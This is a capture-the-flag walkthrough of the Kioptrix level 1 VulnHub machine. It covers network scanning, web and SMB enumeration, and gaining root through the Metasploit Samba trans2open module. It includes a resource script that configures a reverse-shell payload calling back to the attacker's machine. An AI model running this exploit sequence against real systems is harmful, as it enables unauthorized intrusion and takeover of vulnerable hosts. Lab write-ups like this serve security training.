So today we will be doing the first machine of the Kioptrix series, which can be found on VulnHub. The challenge says "Email", so I guess the flag is in the mailbox of one of the user accounts.
So to start off we run
netdiscover -r 192.168.0.0/24 to find the machine on the local network. But it doesn't show anything, yet again. So I googled and came up with nmap's host discovery (ping scan) mode:
nmap -sn 192.168.0.0/24. That works fine, so we will use it for any new machines, since netdiscover always takes a while and it's a gamble whether a machine shows up or not. The machine should be at the .131 address, since we are .129 ourselves.
So let's run a normal and an all-port nmap scan with the following two commands:
nmap -sV -sC -vv 192.168.0.131 -oA nmap and
nmap -sV -sC -p- 192.168.0.131 -oA nmap-full. (The output basename must be one word; with a space, nmap would treat "full" as an extra target to scan. -oA writes three files per scan: .nmap, .gnmap and .xml.) We use verbose on the first scan so we can start other enumeration while it is still running.
We see port 80 is open, so let's run nikto and dirb against it while nmap is still running, with the following two commands:
nikto -host http://192.168.0.131 -output nikto.txt and
dirb http://192.168.0.131 -o dirb.txt .
While these are running we can have a look at the nmap results; by now nmap should be done.
```
# Nmap 7.80 scan initiated Thu Feb  6 06:38:32 2020 as: nmap -sV -sC -vv -oA nmap 192.168.0.131
Nmap scan report for 192.168.0.131
Host is up, received syn-ack (0.0013s latency).
Scanned at 2020-02-06 06:38:32 EST for 125s
Not shown: 994 closed ports
Reason: 994 conn-refused
PORT     STATE SERVICE     REASON   VERSION
22/tcp   open  ssh         syn-ack  OpenSSH 2.9p2 (protocol 1.99)
--snip--
80/tcp   open  http        syn-ack  Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     syn-ack  2 (RPC #100000)
139/tcp  open  netbios-ssn syn-ack  Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   syn-ack  Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
--snip--
1024/tcp open  status      syn-ack  1 (RPC #100024)

Host script results:
|_clock-skew: 1h01m48s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX<00>                  Flags: <unique><active>
|   KIOPTRIX<03>                  Flags: <unique><active>
|   KIOPTRIX<20>                  Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   MYGROUP<00>                   Flags: <group><active>
|   MYGROUP<1d>                   Flags: <unique><active>
|   MYGROUP<1e>                   Flags: <group><active>
--snip--
```
Our full port scan didn't find any extra services. We have a couple of ports to look at: 80, 111, 139, 443 and 1024. It looks like we either have to exploit Samba on port 139 or the web server on 80 or 443. Let's have a look at port 111, since I'm still curious what this port is normally used for: it is rpcbind (the RPC portmapper), which tells clients on which port each registered RPC program is listening; the status service on port 1024 is one such registration. Doesn't seem like we can do anything with it here. Should really look into the service later on.
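Since -oA also writes a grepable nmap.gnmap, the port triage above can be scripted instead of read by eye. The following is an added example, not code from the original post: it lists the open ports with their service and version strings, then derives "product version" search terms for searchsploit. The gnmap sample inside it is constructed from the scan results on this page (nmap writes "/" inside a field as "|", which the script reverses); the function names and the file name are my own.

```shell
#!/bin/sh
# nmap-triage.sh (added example): list open ports from a .gnmap file and
# derive searchsploit terms. Usage: sh nmap-triage.sh nmap.gnmap
# With no argument it runs against the constructed sample below.

# Constructed sample of nmap.gnmap for the scan on this page (not a real file).
SAMPLE_GNMAP='# Nmap 7.80 scan initiated Thu Feb  6 06:38:32 2020 as: nmap -sV -sC -vv -oA nmap 192.168.0.131
Host: 192.168.0.131 ()  Status: Up
Host: 192.168.0.131 ()  Ports: 22/open/tcp//ssh//OpenSSH 2.9p2 (protocol 1.99)/, 80/open/tcp//http//Apache httpd 1.3.20 ((Unix)  (Red-Hat|Linux) mod_ssl|2.8.4 OpenSSL|0.9.6b)/, 111/open/tcp//rpcbind//2 (RPC #100000)/, 139/open/tcp//netbios-ssn//Samba smbd (workgroup: MYGROUP)/, 443/open/tcp//ssl|https//Apache|1.3.20 (Unix)  (Red-Hat|Linux) mod_ssl|2.8.4 OpenSSL|0.9.6b/, 1024/open/tcp//status//1 (RPC #100024)/  Ignored State: closed (994)'

# open_ports FILE: print "port/proto<TAB>service<TAB>version" for every open port.
# gnmap port entries look like port/state/proto/owner/service/rpcinfo/version/
open_ports() {
  awk '
    /Ports:/ {
      line = $0
      sub(/.*Ports: /, "", line)
      sub(/[[:space:]]*Ignored State:.*/, "", line)
      n = split(line, entries, ", ")
      for (i = 1; i <= n; i++) {
        split(entries[i], f, "/")
        if (f[2] != "open") continue
        s = f[5]; v = f[7]
        gsub("[|]", "/", s); gsub("[|]", "/", v)   # undo the gnmap "/" -> "|" escaping
        printf "%s/%s\t%s\t%s\n", f[1], f[3], s, v
      }
    }' "$1"
}

# exploit_queries FILE: turn version strings into "product version" terms,
# e.g. "Apache httpd 1.3.20", "OpenSSL 0.9.6b". Services nmap could not
# fingerprint (Samba here) are flagged so they get probed another way.
exploit_queries() {
  open_ports "$1" | awk -F '\t' '
    BEGIN { re = "([A-Za-z][A-Za-z_-]* )?[A-Za-z_]+[ /][0-9][0-9A-Za-z.]*" }
    {
      v = $3; found = 0
      while (match(v, re)) {
        t = substr(v, RSTART, RLENGTH)
        sub("/", " ", t)                 # "Apache/1.3.20" -> "Apache 1.3.20"
        if (!seen[t]++) print t          # de-duplicate across ports
        found = 1
        v = substr(v, RSTART + RLENGTH)
      }
      if (!found)
        print $1 " " $2 ": no product/version string from nmap, fingerprint it separately"
    }'
}

demo() {
  tmp=$(mktemp)
  printf '%s\n' "$SAMPLE_GNMAP" > "$tmp"
  echo "== open ports =="
  open_ports "$tmp"
  echo "== searchsploit terms =="
  exploit_queries "$tmp"
  rm -f "$tmp"
}

if [ $# -gt 0 ]; then
  open_ports "$1"
  exploit_queries "$1"
else
  demo
fi
```

The search terms are starting points, not answers: the regex also picks up noise like "protocol 1.99" from the OpenSSH banner, and each term still has to be pasted into searchsploit and judged by hand. The "fingerprint it separately" line for port 139 is exactly the gap the Metasploit smb_version scanner fills later in this write-up.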
The nikto and dirb scans are done, let's have a look at the results:
It looks like we got quite a few false positives: the //etc/hosts file, the WordPress files and the possible backdoor that nikto reported are not actually present on the server. /manual/ and /usage/ do exist. The usage page seems interesting:
While looking around, the /test.php file is also listed. It isn't interesting; it only shows the following. The tag `<?php4` is not a valid PHP opening tag (PHP expects `<?php` followed by whitespace), which is most likely why the server returns the file as plain text instead of executing it, so this output tells us nothing about whether PHP is installed:
<?php4 print "TEST"; ?>
At the bottom of the page we find the following: Generated by Webalizer Version 2.01. Are there any exploits for this version? Let's check with searchsploit using the following command
searchsploit webalizer. Doesn't seem like there are any.
While browsing the web I found https://www.cvedetails.com/cve/CVE-2002-0180/, which looks like a code-execution vulnerability (a buffer overflow in Webalizer's reverse DNS lookup, so it needs reverse lookups enabled and an attacker-controlled hostname for a visiting IP). But there is no exploit code in searchsploit, so it might be a tough one to exploit.
On to the next port, 139. I'm trying to enumerate the SMB service on port 139, but I'm having some problems: enum4linux gave me a couple of usernames and then stopped running after a short while. Let's save the usernames to a text file, then have a look at Metasploit, which I normally don't use but need to learn anyway.
Let's keep it simple; we can format the usernames later if we need them (most wordlist tools expect one name per line). Let's echo them to a text file with the following command:
echo "administrator, guest, krbtgt, domain admins, root, bin, none" > kioptrix/usernames.txt
Let's start up Metasploit with
msfconsole and use the
search smb command to see what we can do. At the bottom we see a bunch of exploits, but nothing I want to do with them yet. If we scroll up we can see a bunch of scanners:
Let's use a couple of these to see what we can find. Below are some results. You can just copy the module path and load it with the
use command followed by the path, like
use auxiliary/scanner/smb/smb_version. Then we can do
show options to see the settings we have to set. We have to set the target, which can be done with
set RHOSTS 192.168.0.131 (the scanner modules name the option RHOSTS; msfconsole also accepts RHOST as an alias). Then we can use the
run command to run it.
It looks like it is running Samba 2.2.1a. Are there any exploits for it? Let's run searchsploit again; it lists some interesting exploits. Since we are using Metasploit already, let's find the matching modules in there.
The first trans2open exploit is for OS X, and this system is running Red Hat according to the Apache test page, so that is not it. The second exploit, nttrans, is described in Metasploit as a DoS (denial of service), which is not what we want.
The third exploit, trans2open, seems interesting; it is available for multiple platforms.
Let's use number 1 from the search results, the Linux one (exploit/linux/samba/trans2open), check the options like we did before, set the RHOSTS and then run.
The meterpreter session seems to open but dies instantly:
Maybe we have to use another payload? Let's see what the exploit is using at the moment. The current payload is listed by show options, and all the advanced options by
show advanced. It is running the default linux/x86/meterpreter/reverse_tcp payload.
With the show payloads command we can see all the available payloads. Let's use a plain reverse_tcp shell payload instead; a shell stage has far fewer dependencies on the target than the Linux meterpreter, which often matters on a box this old.
The use payload command I tried first is wrong; the correct command is
set payload linux/x86/shell/reverse_tcp. Let's check the options again, all good? I changed LPORT to 8080 and ran it again.
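So the exploit does not have to be retyped, here is the working sequence from this section as a Metasploit resource script. This is an added example and not part of the original post: it assumes the exploit/linux/samba/trans2open module selected above, the target 192.168.0.131, and that our own address is 192.168.0.129 as noted during host discovery; the file name is my own choice.

```text
# kioptrix1-trans2open.rc  (added example; run with: msfconsole -q -r kioptrix1-trans2open.rc)
use exploit/linux/samba/trans2open
set RHOSTS 192.168.0.131
set LHOST 192.168.0.129
set LPORT 8080
# Weak setting: the module default, linux/x86/meterpreter/reverse_tcp, produced a
# session that died immediately on this target.
# set PAYLOAD linux/x86/meterpreter/reverse_tcp
# Working setting: a plain staged shell.
set PAYLOAD linux/x86/shell/reverse_tcp
exploit
```

Keeping the failing payload as a comment next to the working one records why the default was changed, which is worth having when the same box is revisited later.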
Looks like we got root access! But now we have to find the flag, which is supposedly in an email. Let's look around for a bit, and if we can't find anything, let's google 😉
So I checked the home directories and /root and could not find it, so I googled: local mailboxes live under
/var/spool/mail. I catted the mailboxes of the three users harold, john and root, and in root's I found:
We completed the challenge, on to level 2 in the Kioptrix series.